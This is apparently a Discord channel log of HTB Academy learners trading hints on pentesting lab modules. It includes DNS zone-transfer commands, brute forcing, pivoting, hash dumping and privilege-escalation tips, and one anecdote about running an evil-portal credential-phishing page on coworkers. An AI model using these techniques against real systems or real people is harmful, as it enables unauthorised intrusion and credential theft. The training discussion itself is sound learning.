#modules

You can do bruteforce instead of dig

I see that on https there is a basic auth, but I can't run hydra because of an SSL error...

I already tried brute force SMTP , RDP , FTP

to find subdomains?

mysql block my host if I try to brute

Yes

try smtp with the username in email format

already tried

and use a common wordlist😉

ok so it s the wordlist the problem...

yeah i found some subdomains like ns.inlanefreight.htb and i try dig again but nothing happen

yes

thank you...

any hint?

I second this question.

You need to use subbrute, and then you'll get a set of subdomains to try with

i found 3 subs no one work:

dig AXFR @IP helpdesk.inlanefreight.htb

; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> AXFR @IP helpdesk.inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

There is a shorter domain that should work, did you let the command run for a bit?

yeah

h* is gonna be your only hint

I just sanity checked this earlier

thank you

You can use a vm

👍

It feels so much better with the VM specially after I changed it to 50% @fathom pendant

Can anyone who used backbox or blackarch give their opinion on the distro?

no because it has nothing to do with modules

read #welcome verify your account and then you can ask in #general

if you have only 500 cubes, and you need to pick one module from tier 3, which one would you choose ?

ADCS

simple reason: ADCS is the hottest thing right now in pentesting AD networks

but training materials are sparse

over kerberos attack ?

definitely

theres other training out there you can do for kerberos stuff

adcs practice is hard to find

eeem I got ur point , fair enough ty

my disclaimer would be that I havnt finished the adcs module yet

but its a big reason I got excited for getting my free gold sub

free gold sub ?

found a bug, htb gave me gold sub for it

congrats bro , that's awesome

congrats, that's a major W (win)

disagree with this, many of the ESCs need to be chained with other kerberos attacks in order to succeed

its not a matter of whats priority to learn. but whats better use of cubes

you can go elsewhere to learn the necessary kerberos stuff, adcs practice stuff is harder to find

I agree with that, but many of the kerberos attacks steps are not in depth because it's required knowledge, so if you're not already familiar with kerberos stuff, it can be confusing

the ADCS module is probably better value, but it won't be as effective if kerberos attacks are new to you

Reasonable disclaimer, I still wouldnt change it as my answer to the original question

but id agree that if someone had more cubes to spare, then kerb attacks would be a good first one. Im doing it now myself

fair enough

Module: Using the Metasploit Framework
Section: Encoders

Text: Shikata Ga Nai (SGN) is one of the most utilized Encoding schemes today because it is so hard to detect that payloads encoded through its mechanism are not universally undetectable anymore. Far from it.

Can someone please re-word this? I can't comprehend its meaning in its current form.

It is so hard to detect, because it is not universally undetectable makes no sense to me.

it's been posted to #858470491676737536
sgn was very difficult to detect back then but now it's easily detected

Thanks that is a nice distillation.

if you want a slightly deeper how: its basically perfect at making a payload not trigger static signatures, but sadly instead its own decoders gets sigged instead.

So really, no matter how many iterations you'd do the decoders are always present and found

yes cause the last decoder on the stack will just get flagged by a competent AV

you could mix it with other more modern means but then it just brings up the question why not just rely on those other modern methods instead

yep evasion nowadays is not as simple as just an encoder anymore

also beating the static signature is literally only half the battle 😂

only a quarter or less if we wanna be pendantic

It is a bit sad doing these modules knowing that the most basic EDR product would block literally everything I'm doing

you gotta crawl before you can run

I need assistance on module Supply Chain Attacks: Dev-not so ready secrets

anyone has a moment?

why target disconnected continuously and slow

Enumerate the "flagDB" database and submit a flag as your answer.

Attacking Common Services - SQL.

I found mssqlsvc's password, but I can't seem to log in. Am I on the right path?

Anyone able to pop me a hint for DETECTING WINDOWS ATTACKS WITH SPLUNK - Detecting Ransomware please?

Modify the action-related part of the Splunk search of this section that detects excessive file overwrites so that it detects ransomware that delete the original files instead of overwriting them. Run this search against the "ransomware_excessive_delete_aleta" index and the "bro:smb_files:json" sourcetype. Enter the value of the "count" field as your answer.

I've modified the action-related part of the splunk search and changed the index to match that in the question however the count I am getting does not seem to be right.

Edit: Figured it out

There is a tool called tplmap. It's a python script that automates Server Side Template Injections. When I use it, it returns this error:
module 'collections' has no attribute 'Mapping'
This error is due to the "importing from collections was deprecated and eventually removed in Python 3.10. The syntax in 3.10 is to import collections.abc instead."
Can you please help me edit the code so that it uses collections.abc instead of collections

try another authentication mode

Will do, kind sir.

Thank You for the response.

Hi everyone! I'm stuck on the second question in the CrackMapExec Skills assessment. Could anyone provide a nudge?

im not sure if my CME is broken or if I'm going down the wrong path

I've been having all kinds of issues with nmap getting hung at near completion (usually > 90% complete) during the "Network enumeration with nmap" module. It doesn't seem to be tied to any certain flag or command, the pwnbox pings at around 3ms so shouldn't be related to any kind of lag. Any tips on anything I can do to make sure the scan completes?

It seems to be getting hung at "undergoing script scan"

trying to run the socksoverrdp server.exe on the 2nd target machine but getting error

RDP and SOCKS Tunneling with SocksOverRDP
PIVOTING, TUNNELING, AND PORT

https://tenor.com/view/travolta-desert-dry-drought-gif-20765263

The ACL Enumeration section's lab is near unresponsive.

I cannot enumerate if I don't get any output.

Any way we can get this fixed?

plugin not loaded on the client

Did you get the success message when loading the dll

I go tsuccess message with client.dll

Why does powershell call it "Self-Membership" and Bloodhound call it "AddSelf"???

I can't find anything linking the two. This is for ACL enumeration in AD labs.

Are you following the section exactly?

maybe I am missing something but it tried section exactly

Did you skip over rdp to the middleman host?

don't get it

Then you skipped over something in the section

You're at point a. You need to go to point b. And then you can get to c through pivots

Where do I find a cross reference between BloodHound labels and actual ObjecAceTypes?

@heavy marsh

Bloodhound is likely listing the ACL, not the ACE

So there is no cross-reference?

Unsure if you've solved it already, but i also had challenges with this question. Did solve it and at least for me the hash values changed because i reset the Admin pwd, so had to restart and grab the original hash.

#modules message

#modules message

Good luck. Was a tough slog to finish the module but I learnt a lot.

I found this

Later on the same page it has this:

But there is no cross-reference between them. That's what I'm looking for.

This is still a good reference though:
https://www.thehacker.recipes/a-d/movement/dacl

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces the connection is pretty obvious

how does one dump an NTDS.dit? I don't get it the password module just talks about using CME to do it, but isn't there another way to do it if you have the VSS file?

nvm I figured it out

would modules for example like, windows fundamentals, like, be incliuded if you just selected a job=path to complete? idk if i'm wording this right...xD if, you just picked a job-path. and along the way of completing it, would you still get the individual credit/badge for the modules that make up the path itself? i'm like assuming yes but just wanted to make sure xD

if this is wrong channel to ask i do apologize i am new here

Most of the job paths already have some assumptions made that you have operating system fundamentals down so they can expand on their respective subject down the line

Each job-role path has a respective "pre-requisite" path that's recommended

tysm! it kinda seemed like common-sense, but i just like to make sure by asking. i have the same issue IRL aswell, and haven't been able to figure out why. i just..idk, i guess need confirmation coming from more than just my own mind xD

i inted to become certified in pentester

Learn by doing, and fucking around

The academy module labs are great to fuck around with because: they're an isolated an environment

i truly love that. it's exactly what i've been doing, and it's very nice to hear another person say something like that

i'm a lil social awkward so like, i'm not also sure my thought process is correct

So if you brick it, just respawn it

¯_(ツ)_/¯

but that's exactly what i've been doing,

Step 1: if you don't get the answer to a module question - re-read the section, you likely overlooked something

I.e. the common pitfall that people make in the Linux Fundamentals module is not using ssh and connecting to the target

And wondering why their answer is wrong

Step 2: if you're sure a set of commands should work, do it Step by step until it breaks

Step 0: RTFM

https://imgur.com/B9OBJVP

Most of these modules were written by people that didn't have the grace of having a legal place to learn these things

So if they could learn from nothing. You can learn from something

i went from, learning red-teaming/pentesting/bbh could be a job/career in the first place. like at all. and new right then and there it's what i wanted. i always kinda messed around with hacking throughout life, but, obviously, for selfish/the wrong reasons. but to learn that like. the literal existence of bug bounty programs exist. or that pentesting for companies exist. it just truly aligned up with myself. i've gone from like...just kinda looking at youtube vids, and discovering hackthebox, to, running my own VMS(cuz at first, i ilterally only had 1 pwnbox per 24 hrs), but once i learned that literally all the pwnbox is, is a vm essentially, and i could just run my own, to practice all i want (i still sub'd to academy of course though lol with time), but then i started messsing around( and yes, bricking) my own home systems, labs, etc. ive played with kali, parrot, i really like blacharch linux but just, i guess don't have knowledge enough to nav through it? (none of the same cli commands from kali work on it), but then, with time, i also learned that it TRULY doesn't matter which OS i picked. i think i just wanted to look cool? like, you can essentially create your own OS ezpz lemon squeezy in minutes

with just the linux kernel essentially, i can wipe a machine, just slap on linux, and from there, install and use any of the toools i wanted. like.....i didn't literally NEED blackarch, cuz it looked cool, cuz ill literally never even used most of those 30000 tools

It's also easy to get trapped in the mindset of "I couldn't possibly be wrong, it's the module that's broken"

i've prolly wiped/re-installed systems like 20 times since the start lol

When in fact. It's a skill issue

no no no no no no

yes

And I will call out a skill issue, if I know for a fact, the intended command works

how can i turn off the slow mode? i like can't reply and send messages like i would like

Slow mode is on admins side not ours

Its enabled to stop people from spamming a bunch

its 100% a skill issue always in my case. i just choose to not give up. if i really sit there long enough, and if i really sit there and figure out like, "okay i did this this and this", like....so far, even if it took an all-nighter, i've been able to complete the tasks i've started

A lot of modules miss out on certain things that are crucial to getting the answer to some of the questions asked. It could be a simple one liner that is necessary and you failed to learn about at all.

Also a good method of asking questions here is:
Module Name & Section
What you're struggling with
What you tried

liek right now i'm on the "oopsie" lab in the HTB labs,

the one prior, gave me the most issues, but omg did it feel so good to finally complete it in the end, with the reverse(dontwanntputspoilers)

That's the thing, it's meant to lead you in the direction tbh. They lead you to a command that's almost like what you need, but not quite

yse^

and i truly enjoy that

This channel isn't for starting-point machines btw

oh im so sory

#welcome explains how to access more of the server

im sorry thats my fault

thx , I will look into it

This channel is for the learning modules in htb academy

You're good, just letting you know - if you need nudges there's a more appropriate place to ask

Also fwiw, walk-throughs can be a good teacher - if you're not just blindly following them

Question things, asking why, is how you improve

heard, ty. i completed the linux fundamentals module last night. i was kinda stuck or hesitant on what to start on from there? but like, i figure i should go and learn the things i don't already know. so i picked the networking module. i figure it's a logical thing to learn allllllllll the basic fundamentals, even if they seem irrelevant at first. cuz taht's exactly what it was for me like, "well i'm not trying to learn how to be a sys admin, or create, run, and maintain a network, i just wanna be a hacker"

I spent almost 2 hours last night trying to see if I'm going crazy or doing something wrong while trying to do a password attack only to realize that you needed to wait 30 min, not only that the module told you to attack the wrong protocol

but i think it made sense to like. in order to be the best version of what im going for, it makes sense to just know absolutely everything, and not just oh the hacker modules

Information Security Foundations Path is a good one, it's a pre-req to the pen tester one

^ty

It's a lesson in humility, don't just assume the question is telling you where to start

The pivoting module is similar

It's assuming you've read the section up to that point

Though pivoting module is very much a follow-along guide

Always scan the target first, even if given a bunch of info

yes it is not a "oh you missed something in the section" thing

just this convo alone with you guys really makes me feel very encouraged about going after this. i didn't have anyone IRL to talk to about it, and no mentor-type person to ask aswell. so i just wanna say thank you guys for just being a cool community like this

Rule 1 of enumerating: treat it as if you didn't have the question to point you

i love how you guys aren't just flat out giving out the answers to the questions, but more of forcing you to see what it is your doing and try and figure it out

omg, tbh, it's no lie that when you read "OSINT is almost like, 90% of a successful campaign"

As long as you're not just seeking the answer, someone will help

truly doing all the research and info gathering you can on the target like.

really really really really does help out so much

also for password cracking, i found out the hard way that like,

Which is why earlier I stated that including what you've done helps narrow down what someone will suggest to try

essentially it's not like in the movies, if the password is IN THE WORDLIST you're using to "crack" the hash, it simply won't happen

Wait until you learn about masking :)

That takes AGES

you can run a cracker all day and overheat your machine all day but so far i've experienced that like, dude if that pw simply isn't in the wordlist youre trying, it won't catch

Depending

If you have trouble with the Oracle TNS exercise in Footprinting because sqlplus cannot be installed with apt:

E: Unable to locate package oracle-instantclient-devel
E: Unable to locate package oracle-instantclient-sqlplus

installing it manually worked https://www.geeksforgeeks.org/how-to-install-sqlplus-on-linux/

Hashcat and John are the 2 major ones

is there a way to like.......idk, config the tool, like, hashcat for example, or john, like. let's say i throw one wordliost at it

but, is there a way to like,

Occasionally you'll see Chickenman poke his head in here

(Chickenman as in the lead dev for hashcat btw)

idk.......yes, theres 1k words in the word list, but is their a way to config it to be able to like. use combinations of the passwords? liek if in the word list i'm using contains all the colors, and then all the countries, individually is there a way to set it or config it to where like, it'll run through all of them individually,

but then start to COMBINE the words., like, blue, red, usa, india, and THEN, blueusa, redindia?

Not really? You'd need to generate that list yourself

ahhhh, ty

Iirc there's an attack or whatever mode but I'd have to rtfm for that

Also if you didn't catch on: rtfm, read the fancy manual

im sorry i think i know what iirc means, but could i ask you to plz tell me the rtfm?

the pwnbox that comes with the website has a ton of wordlists.

ahhhhhhhh

sorry lmao

Yes and in password attacks, mutated section youre instructed to create a wordlist using a ruleset

Btw that list is used throughout the rest of the module afaik

oh @sullen tusk when you do need to use wordlists in a module, a lot of the times the ones you are supposed to use if not specified will be on the upper right hand corner of the page in a resources button

^

If it's not there it's likely gonna be rockyou

But usually they'll tell you what list to use

14 million passwords in rockyou; got like 40 more lists with millions of passwords

no, yes, it does come with a good wordlist, i was refering to cracking my own wifi password with a flipper and marauder. like, obviouslyiknowmyownwifi'spassword, i just wanted to make sure i had a lil methodology down. so like, essentially what it was is like, i would set to like, record of sniff the traffic, then, get the wap, and like, deauth it to get the handshakes (i guess the wifi devboard simply isn't strong enough, but i literally couldnt FORCE any device off the network, and the capture the eapol when reconnecting) i like literally had to go around the house making everyone disconnect and reconnect to the wifi,

Wifi cracking is different from other bruteforce methods fwiw

then once i had the 4 eapols. i took the pcap from wireshark and converted it into the hash from hashcat, and then ran a bunch of different wordlists through it

it took my cheap hp 250$ laptop 4 hrs and several pauses/restarts(because of temperature), just to get through the entire rockyou xD

¯_(ツ)_/¯

but then later, i learned that what i COUDLVE done, was use my actual real cpu, with like, a friggin graphics card, and use that,

Yep

Or gpu pass through in the vm

but then also thats when i learned, it liuterally DOESNT matter, if the pass itself wasn't already in the wordlist

it is damn near impossible to hack wpa3

many says to crack an egg ¯_(ツ)_/¯

therse a 3?!?!?!?

wpa3 is just the version

-actual gasp-

Like wi-fi 6

no i know, but wpa2 iscrazy difficult as is xD

yeah the only way oyu gonna hack wpa3 is by pointing a gun at the owner.

Or cat 6 cables

so i truly believe it when said 3 is damn near impossible xD

lmao

Impossible for just casual people

the evil portal one was fun aswell. i ran it at work just to see if i config'd it correctly to work in public and at home(obviously, this is literally the ONLY time i used or will use it in public, cuzz i had permission)

ubt just to see the looks on everyones faces is priceless, like, "omg?? we have free wifi now?? all i gotta do is enter my gmail credentials??? bet!!"

aaaaaaaand, hit send, nothing happens xD

Yep

just any input is sent to my flipper, obviously i stood right next to them and made them type like gbberish, but

Well not "nothing"

it's those lil moments like that that make it fun aswell

But academy will not teach you any type of attack like that btw

i mean, they hit send, and it just refreshes to the same page, meanwhile whatever they entered is sent to me

Were getting severely off-track now

no no that was just for funsies on the side, sometimes i get burnt out studying academy

im sorry =/

i think that's twice now, i really am. i'll stop

All good just reigning it in before someone's help request gets drowned out

There's a #general chat btw

Read #welcome

The otherday I tried doing stuff i learned in HTB on some scammers I got contacted by from singapore

You should refrain from such things. They are illegal and violate the rules of HTB

This is true, but don't think that a bigger wordlist is always better, we have smarter attacks these days than just adding more and more words

okay. none of it was hacking it was just OSINT stuff, btw.

ehhhhh, we'll see about that

This man is cookin

a lot of people are very confident that their preferred AP vendor is going to implement WPA3 correctly, I'm a little less so

❤️ I still need to join your discord btw, I forgor last time

haha

wait the vendors implement the WPA3

Vendors doing things incorrectly? That never happens

haha ikr

Yes, vendors need to implement it for your device to use it

Like 5G

I thought wpa3 is like a program that's executed by the system embedded onto the hardware

I have a feeling we'll see plenty of "oops the field size is too small and all our customers have been using easily crackable WPA3 my baaaaad"

you know widely distributed by the governetment/FCC

the protocol, which is based around the dragonfly protocol iirc

My wifi password is one334 good luck cracking it

relied on the discrete log problem for it's hardness

which works if implemented properly

Much like RSA and prime factors

right

but much like weak RSA you can find in some CTFs and such

it can be done wrong with only small variations

😂😂

too short, minimum of 8 for WPA2 😛

wait @paper gust youre the guye MarcieLee said created hashcat, that's pretty cool

been using that thing all week

well, i didn't create it, i just work on it as a part of the team

Anyone here with bug bounty experience? I am newbie here !

oh

^ he just hangs out here

This isn't the channel to discuss bug bounties (in general)

Read #welcome

I summoned the chicken

https://tenor.com/view/adult-swim-comedy-billy-witch-doctor-arise-chicken-arise-gif-3382769

haha

Ooh my bad thanks for help!

Anyway we've hard derailed the channel (as usual for a Tuesday morning)

haha per usual

So about those academy modules

Pretty challenging amirite?

I found myself duckduckgoing for clues to answers all the time but that's stopped as I've gotten to the attacking parts

Asking here is good for a quick sanity check

Could someone please tell me what I might be doing wrong with the "Tapping Into ETW" module? (https://academy.hackthebox.com/module/216/section/2325)
I replicated all the steps, have SilkETW.exe running as Administrator, did reset the VM, but I can't find the log entries for both examples in the etw.json

Wdym "reset the vm"

Actually clicked "restart" from within the vm?

I restarted the target windows vm via the web interface to get a fresh instance

Resetting from the web interface starts a new instance

So it didn't capture anything since its new

Hello, in Attacking Common Services - Easy we are supposed to brute force the user fxxx password. I am struggling with this since quite a few hours using rockyou list. mysql is blocked after around 100 passwds, ftp doesn't provide anything, rdp either, smb disagrees. Is there anything I am missing ?

I restarted the VM and then did all the steps again

Ah

That bit was unclear in how you listed the steps

You listed it as though resetting the vm was a step

for the first example I see the cmd.exe under the spoolsv.exe but I can't find the entry if I search for the PID of the spoolsv.exe

(Which sounds odd to me but I haven't done these modules)

hmm ok

Are you looking at the spoolsv.exe from the context of the example: or from looking at it in the instance

Bc very likely. Those will be different

I follow the steps from the example and search for the PID I used from process hacker (not the one from the screenshots)

Footprinting Lab - Medium . i need some help. i have logged into the SQL managament sudio, i ave expanded all avaioable menu's but i cant find anything usefull. plz help

you cant even disassociate so its probably not possible to capture a 4way.

Check out the ||Explorer Tab -> Expand Databases, you can also issues sql queries, look around more||

i have expanded the DB's like 10 times. lol

https://www.youtube.com/watch?v=moCgS2kfxnU&t=57s

one of the tables is bound to have the HTB account

HTB could be a customer

allright, thanks . let me have a crack at it

this video is the shiz niz. after watching it ive got the answer. MY GHHHAAAAAAADDDDD

Oh, I know Youre welcome

Hi, I'm trying to figure out the distinctions between using wget, get, and curl. Are some of them only for tranferring one-way like only from the target to our host?

It's in the getting Started module in the Pentester job path

I cant remember, was it the oracle db?

have you tried attacking smtp?

@lusty thicket SMTP provided the login fxxx@xxx.

Hi everyone, any tips for the last question in "STACK-BASED BUFFER OVERFLOWS ON LINUX X86" please? I

hey guy, I have a problem when fuzzing through proxychains.

||proxychains ffuf -w directory-list-2.3-small.txt:FUZZ -u http://IP:PORT/FUZZ||

can someone give me a hint what I'm missing please?

can you give me a hint of the module and section?

it's on Dante lab ...
but going through the modules I did find anything that points out that I need extra "touch" when doing proxychains ...

there's a -x in the help menu (ffuf) that explain about using socks5://127.0.0.1:1080 but if I'm using proxychains isn't it doing it by itself?

you should get into the ligolo gvng

what is it?

pivoting tool that uses layer3 instead of layer5 for the tunnel

making everything better

and now it has been updated

you can have X tunnels at the same time

found out that when doing:
||ffuf -x socks5://127.0.0.1:1080 -w //directory-list-2.3-small.txt:FUZZ -u http://IP:PORT/FUZZ ||
& when doing
||proxychains ffuf -x socks5://127.0.0.1:1080 -w //directory-list-2.3-small.txt:FUZZ -u http://IP:PORT/FUZZ ||

it has the same result, Y it happens I didn't get

so If I understand u correctly, the reason is that -x flag works on layer 3, so that's Y it happened over the proxychains ?!

dude

what?

lol, then no...

I'm trying to figure out Y both commands do the same thing.

guess I need a bit more research ...

hi everyone, I'm stuck on the module "broken authentication".
in the section "Predictable Reset Token", there is an md5 hash that's supposed to be generated based on the epoch time in milliseconds, but i can't seem to find a valid token for the admin, after brute-forcing the +1/-1 seconds.
anyone knows why that could be ?

found the problem, i had to add the username in front !

usually having a username helps :^)

Module :Windows Privilege Escalation
Windows Built-in Groups
Hello, I have an issue with the command : $key = Get-BootKey -SystemHivePath .\SYSTEM
I get this error : Get-BootKey : Requested registry access is not allowed.
I don't know what to do, i did not find any usefull information online
Thx

• Requested Registry Access is not allowed = you don't have perms to view it :) hth

I don't undestand i did everything that was in the module

Do you have any hint ?

@lusty thicket The pass obtained doesn't satisfy much mysql : ERROR 1045 (28000): Access denied for user 'fxx@xx'@'10.10.15.17' (using password: YES). It looks like a dead end as ftp doesn't appreciate it much either.

Are you running this on the copy of the SYSTEM hive you made?

yes

and you made the copies how?

mysql -u user -ppass -h ip

with diskshadow, i shadow the C: to E:. Actually the SYSTEM file was already in the folder. How do I make one ?

I thought so, If you want to use DSinternals on that copy you need to specify its path with the E:\SYSTEM iirc I prefer to reg save its more straight forward

I do use its path. It does not work.

@lusty thicket yes ... same result giving -ppass or -p and pass after, and idem after resetting

weird, just use reg save then, I didnt spend much time on that technique XD theres like 4 ways to copy that, reg save works well.

try leaving out the domain

@lusty thicket .... better after removing domain name👍

yes

How do you copy on your machine ?

copy on my machine? You could use reg save to create the copies of the system and sam registry and use dsinternals to extract or transfer over to your machines and extract with secretsdump.

Yes on my machine, I use xfreerdp and I can not get the files to work them on my machine

xfreerdp has a /drive: option

Review the file transfer module and xfreerdp has a /drive option

You could also use mimikatz, but you should really review the file transfer module.

^ file transfer is invaluable

I had no idea I already did your first mention but I am getting wrong hashes

I even got the 2 hash of Adminstrator
I checked it with impacket
First one hash belongs to 172.16.19.3 (windows)
Second Adminstrator hash belongs to 172.16.19.19 which is linux

But none of them worked
I tried --sam, --lsa, --ntds with hash of 172.16.19.3 but couldn't find a ws01 adminstrator hash, I tried dump hashes using secretsdump with hash of ws01$ account and it didn't work

I know --ntds doesn't make sense, but I am trying what I know it is third day...

Can u put me on the context which module is this and what are u trying to do

U can dm me as well

It is ADCS module which is about certifactes of AD and ESC11 lab

Didn’t do that module

i'm on module password attack - network services, after mount an nfs share, i can not access it, is that the part of the lab or i miss smth

su to root and look around

i forget the exact options you need to set to not have this happen

yep even with root, this was my mount command sudo mount -t nfs 10.129.141.192:/JNFS/ ./nfs/ -o nolock

i meant

you can explore it with root

:^)

yes and i su to root but it still say no permission

Hello still on
Windows Privilege Escalation
Windows Built-in Groups
I can not crack the hash...
I tried with john and hashcat

I can not pass the hash either

@acoustic owl could we go in Dms ?

https://academy.hackthebox.com/module/67/section/640. I have tried with searching "password" in C:\Users. But the password from documents's file is not accepted 😦

Could anyone help me with this ?

Hi everyone, I was wondering if someone could help me in PM for the Assembly skill assessment. I've done the xor loop to decode the shellcode then once I've got the decoded shellcode I can't use it on the target to get the flag 😦

@wheat garden could you help me with this ?

Check the module again to see exactly how to search correctly.
By the way, take another look at the #rules . Simply writing to people via dm or pinging them for no reason is not allowed.

can somebody help me 😢

Is this the question?

Leverage SeBackupPrivilege rights and obtain the flag located at c:\Users\Administrator\Desktop\SeBackupPrivilege\flag.txt

yes and i got the reg save on my machine

If so, you do not need to crack a hash or access the system via PtH

how can I do ?

The module explains exactly what you have to do

thx you ❤️

you're still stuck here? have you tried to dump regs of ws01?

my target was not spawaning in academy

i clicked it but not showing any url

First I even can not find a way to login ws01 to dump hashes I will have to either password or hash(pass the hash login) right? If I follow module I am getting hashes which belongs to only "lab-dc" hostname not "ws01" I tried to dump regs of Adminstrator (lab-dc) but it was useless

i am on introduction

you used secretsdump on dc, use the domain admin's hash to access ws01

Yes, but when I type hostname command it was "lab-dc"

I tried to dump regs but still not ws01 and lab is not accepting

what creds did you use to dump ws01

Blwasp ?

please avoid straight directions of solving an assessment

everything you need to solve anything is within the module's sections

That creds written in lab, I hope it is not spoiler

you have DA, why are you using other creds

Export list for 10.129.138.4:
/JNFS (everyone)

i can not access even with root

help guys :((

su to root and look in the share

ikr, doesn't work

i took a tangent myself on this one (not sure if it's intended process though).

I assume you can get onto the DC given you've answered the first question. You can use certain native commands to roll the Admin DC creds, which you can then use with secretsdump (ala https://wadcoms.github.io/wadcoms/Impacket-SecretsDump/), adjust IP accordingly.

i can unlock a tier 3 module, kerberos vs adcs?

Im thinking adcs, Kerberos attacks has content you could find on the internet, but not too many well explained adcs content around talk less of all the ESCs in the spectreops whitepaper

how well versed are you in kerb? If you understand it well enough.. I did find ADCS good and as mentioned above. not as much ADCS stuff out there compared to Kerb attacks

with that said, my brain did melt a fair bit in ADCS.. somehow made it through.. def helps going in with a decent understanding of kerb and AD

Im definitely gonna come back for this Kerberos attacks when I get the cubes 🫠

Calm down 😅 HTB academy has one of the best support teams ive seen

one of the best

If it is a technical problem, only Support can help you. They usually don't read here in Discord.
Contact support via the green bubble

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

take it up with them, nothing we can do here

I'm sorry to hear that, but there's nothing we can do for you here.
Support is also available via email.

We can't do anything for you here in Discord.

thanks for the answers

will go for the adcs one

i will get cubes for the kerberos later on

May I dm please? I know I might be annoying for you but this is last time I want to show one thing this might be spoiler in here

any one have a second to try an attempt to explain something within information gathering - web edition?

hey everyone, I'm struggling with the last question in the NTLM Relay Attacks module, lesson "NTLM Cross-protocol Relay Attacks": Use impacket's SOCKS server to hold NPORT's relayed connections and abuse them to access the MSSQL service at 172.16.117.60; query the 'flag' table within the 'development01' database and submit the flag.

need help of modules

shall any one help me with modules

i need some modules can u help

I can try, what are you struggling with?

yes

How would you determine in this if there was a vhost?

and further down the line, there's a wordlist that's used to enumerate possible vhosts... are those names only used for vhosts? or can those be actual servers as well?

In PIVOTING, TUNNELING, AND PORT FORWARDING, and section SOCKS5 Tunneling with Chisel. I can't run chisel on target host I get this error: ./chisel
./chisel: error while loading shared libraries: libgo.so.22: cannot open shared object file: No such file or directory
Is there a way to solve this? Or did I understand something wrong in the section

i don’t understand what you mean.. it’s a wordlist

you can fuzz the host header and analyze which request serves different content

yeah so what I mean is that wordlist with vhost names within it, can those names only be used for a vhost, or could they be used for an actual server

?

wth is an "actual server"

a vhost can act as an actual server

compile it statically

a virtual host could allow a physical server to act as if it were multiple servers

to the best of my knowledge

think of it as a virtual server

Hello again,
In Windows Privilege Escalation
DnsAdmins
I leverage membership in the DnsAdmins group to escalate privileges but I can not access to the flag

in windows OS you need to log out and login again to get changes in groups reflected

I did it. I Unconnected myself and connected again, I don't know how to do in an other way

its okay I successed to sign out

Thanks!

you could also use a reverse shell payload too for the dll, just figured that works too.

Can I not do the starting point exercises without connecting to the pwrbox in the LAB ? or do I have to use the 2h I got ?

There's a starting-point vpn

@fathom pendant
yes I tried to use it , I typed open starting_point_TTT.ovpn on VM

it only opened a window

with alot of text

same

anyone here done the common services module?

need help at the SQL Databases section

NVM

it was a syntax error 😭 😭

In the SQL Injection Fundamentals skill assessment, is it possible to obtain a reverse shell? I have command execution, but when I try to establish a reverse shell the website just hangs which leads me to believe a firewall might be in the way?

In the Attacking NTDS.dit section of Password Attacks, HTB mentions that if we are using xfreerdp 'all we must do is copy and paste into the RDP session we have established.' I googled a bit but could not really figure out how to make this work so I ended up using my notes from the file transfer section to answer the questions. I am interested in learning this method though if anyone coule explain?

Does somebody know if the box is broken?
Still cant connect to it.
Been stuck for 3 days now.

Could you connect to the box? If so, how did you do it?

after some suffering i did

its sooooo laggy

I just get connection timeout all day 😄
But mssqlclient.py y -p port user@ip is right?

hello i make the brute forcing module (service authentification brute forcing ) i take a lot of time to brute froce and i have this

yeah but are u trying w the first user?

if yes then wrap the password in quotes

for the special characters

wait how do you mean, i get prompted like this:

Then still in quotes?

oh

i didnt use this no

what did you use?

impacket-mssqlclient -u htbdbuser:'pass'@ip

smth like this i remember

Anyone can give a nudge for Predictable Reset token in the Broken Auth section? I cannot figure it out to save my life. I have modified the script to convert to epoch time, changed the interval from -1 - +1 and even made sure htbadmin was prepended and the times were synced with the server, I have skipped this section multiple times and I really need a nudge so I can put lessons learned in my notes and move on.

+/- 1 second = 2000 milliseconds

Hey Guys, what do you recommend between bloodhound-ce and old bloodhound ? I feel like the ce version is more modern and fluid, but seeing the AD Modile screenshots, I've got the feeling it also has less features

sure but can only get back to you in a bit

Unforntunately i get
"Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication."

.\

Add this before the username

Then i just get "Login failed for user '.htbdbuser'."
:/

Ughhh my brain is not braining

Wait lemme brain harder I really forgot😂

Can anyone help me please with the crackmapexec skills assessments, I'm struggling with the 2 last questions Ccache share and DC01

I'm on the Digital Forensics skills assessment, but every time I try to launch a hunt for Windows.Memory.Acquisition, it keeps saying "While resolving github release Velocidex/WinPmem: Get "https://api.github.com/repos/Velocidex/WinPmem/releases/latest": dial tcp: lookup api.github.com: no such host." what's going on?

hello i make the brute forcing module (service authentification brute forcing ) it take a lot of time to brute froce and i have this

Can anyone help with the module "Active Directory BloodHound" section "BloodHound for BlueTeams"; the first question has me stumped. Tried multiple angles here, and I still get wrong answer. No clue what I'm doing wrong.

okay nvm....still working out how that number got generated.

how do u authenticate to that account in nessus skills assessement im confused

https://ip:nessusport

Anyone?

thanks

for anyone curious, i managed to pop windows section for the dnsadmin group

what worked is running gpupdate /force then logout/login

may have to try a few times but it will work

i got the answer right but dont know how. how do i actually tell with concrete certainty the number of zones on the target name server? i got like 15+ items here

hint: localhost

i dont get it lol

the NS one is well the nameserver

so server and address, thats how i get the 2?

yep (basically)

because when i use just inlanefreight.htb it responds back with way more

yes

because that's showing all the records that exist

on that server :)

and for the question it specifies the nameserver only ohhh

it does not mean that's all the zones

okay okay that makes sense

but for the nameserver, that is all the zones

you're missing another one

(localhost got you thinking of the ns one, look for another one there)

what do you mean?

nslookup -query=AXFR ns.inlanefreight.htb (IP)

got me the answer of those 2 zones

i'm staring at one of your screenshot

and there's two localhost ones

ns and another

internal.inlanefreight.htb?

are you asking or telling

thats the one with localhost ip

but thats not a zone for ns.inlanefreight.htb

it's a zone for the provided IP

(which also happens to be the ns

https://www.cloudflare.com/learning/dns/glossary/dns-zone/

so then are all those other name and address combos zones too for the provided IP?

they can be but they don't necessarily have to be

Read the DNS topic carefully again.

For those interested, I used the latest SharpHound collector, not the one present in the HTB boxes, and data is much better now

thank you, feel a bit lost on this based on what HTB academy provided (not to be that guy)

DNS can also be a bit tricky tbh

Read the pages on Cloudflare. DNS is actually explained quite well there

^ that's the best explanation of DNS i've read so far

https://www.cloudflare.com/learning/dns/what-is-dns/

this is also a good read

dig

think of them as resource records for that zone

im getting this error:

└──╼ [★]$ sudo php -S 0.0.0.0:80
[Tue Jan  9 21:07:18 2024] Failed to listen on 0.0.0.0:80 (reason: Address already in use)

running sudo netstat -plnt gives the following

└──╼ [★]$ sudo netstat -plnt
Active Internet connections (only servers)
